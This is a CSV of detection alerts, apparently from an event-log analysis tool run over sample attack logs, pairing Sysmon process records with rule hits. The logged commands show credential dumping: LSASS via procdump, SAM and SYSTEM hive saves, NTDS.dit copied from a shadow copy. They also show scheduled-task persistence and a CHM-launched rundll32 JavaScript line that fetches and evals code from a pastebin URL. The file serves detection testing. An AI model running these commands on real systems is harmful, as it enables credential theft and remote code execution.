2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a -c : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:50.398 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a Java : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA1FA70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\sam sam : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\system system : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\security security : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation/win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Renamed ProcDump,,rules/sigma/process_creation/win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Suspicious Use of Procdump,,rules/sigma/process_creation/win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,Usage of Sysinternals Tools,,rules/sigma/process_creation/process_creation_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Procdump Usage,,rules/sigma/process_creation/win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe create shadow /for=C: : Path: C:\Windows\System32\vssadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm : Path: C:\Windows\hh.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,HH.exe Execution,,rules/sigma/process_creation/win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,high,HTML Help Shell Spawn,,rules/sigma/process_creation/win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
